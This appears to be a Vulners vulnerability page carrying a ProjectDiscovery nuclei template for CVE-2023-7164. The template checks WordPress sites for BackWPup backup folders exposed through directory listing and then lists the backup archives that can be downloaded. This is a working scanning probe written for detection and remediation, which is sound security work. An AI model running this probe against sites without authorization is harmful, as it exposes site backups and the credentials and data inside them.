Lucene search
K

WordPress BackWPup < 4.0.4 - Backup File Disclosure

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

BackWPup before 4.0.4 exposes backups via directory listing, allowing unauthenticated download; update to 4.0.4.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-7164
10 Apr 202411:42
circl
CNNVD
WordPress Plugin BackWPup 安全漏洞
8 Apr 202400:00
cnnvd
CVE
CVE-2023-7164
8 Apr 202417:28
cve
Cvelist
CVE-2023-7164 BackWPup < 4.0.4 - Unauthenticated Backup Download
8 Apr 202417:28
cvelist
NVD
CVE-2023-7164
8 Apr 202418:15
nvd
OSV
CVE-2023-7164
8 Apr 202418:15
osv
Patchstack
WordPress BackWPup plugin < 4.0.4 - Unauthenticated Backup Download vulnerability
9 Apr 202402:46
patchstack
Patchstack
WordPress BackWPup Plugin < 4.0.4 is vulnerable to Sensitive Data Exposure
9 Apr 202400:00
patchstack
Positive Technologies
PT-2024-15217
18 Mar 202400:00
ptsecurity
Vulnrichment
CVE-2023-7164 BackWPup < 4.0.4 - Unauthenticated Backup Download
8 Apr 202417:28
vulnrichment
Rows per page
id: CVE-2023-7164

info:
  name: WordPress BackWPup < 4.0.4 - Backup File Disclosure
  author: 0x_Akoko
  severity: high
  description: |
    BackWPup WordPress plugin < 4.0.4 contains a directory listing vulnerability caused by lack of access restrictions in its temporary backup folder, letting unauthenticated attackers download site backups, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can download site backups, potentially leading to data theft or further exploitation.
  remediation: |
    Update to version 4.0.4 or later.
  reference:
    - https://wpscan.com/vulnerability/79b07f37-2c6b-4846-bb28-91a1e5bf112e/
    - https://research.cleantalk.org/cve-2023-7164/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-7164
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7164
    cwe-id: CWE-200
    epss-score: 0.02261
    epss-percentile: 0.80862
    cpe: cpe:2.3:a:inpsyde:backwpup:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 8
    fofa-query: body="/wp-content/plugins/backwpup/"
  tags: cve,cve2023,wp,wordpress,wp-plugin,backwpup,exposure,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/"
      - "{{BaseURL}}/blog/wp-content/uploads/"
      - "{{BaseURL}}/wordpress/wp-content/uploads/"
      - "{{BaseURL}}/wp/wp-content/uploads/"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Index of")'
          - 'regex("backwpup-[a-f0-9]{6}-(backups|temp)", body)'
        internal: true

    extractors:
      - type: regex
        name: backupfolder
        part: body
        regex:
          - 'backwpup-[a-f0-9]{6}-(backups|temp)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/{{backupfolder}}/"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '[\w\-\.]+\.(tar\.gz|tar|zip|sql)'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: filename
        part: body
        regex:
          - '[\w\-\.]+\.(tar\.gz|tar|zip|sql)'
# digest: 4b0a00483046022100f17b541c28e0c984e6a443d42bc565cffcdcc05f52ba09e9ea0967dab7f6abd5022100d3ad84a72573d41d9f60825bcebd99a41651d5eb52e7d64dac7bb6a9a083888e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.5
EPSS0.02261
SSVC
8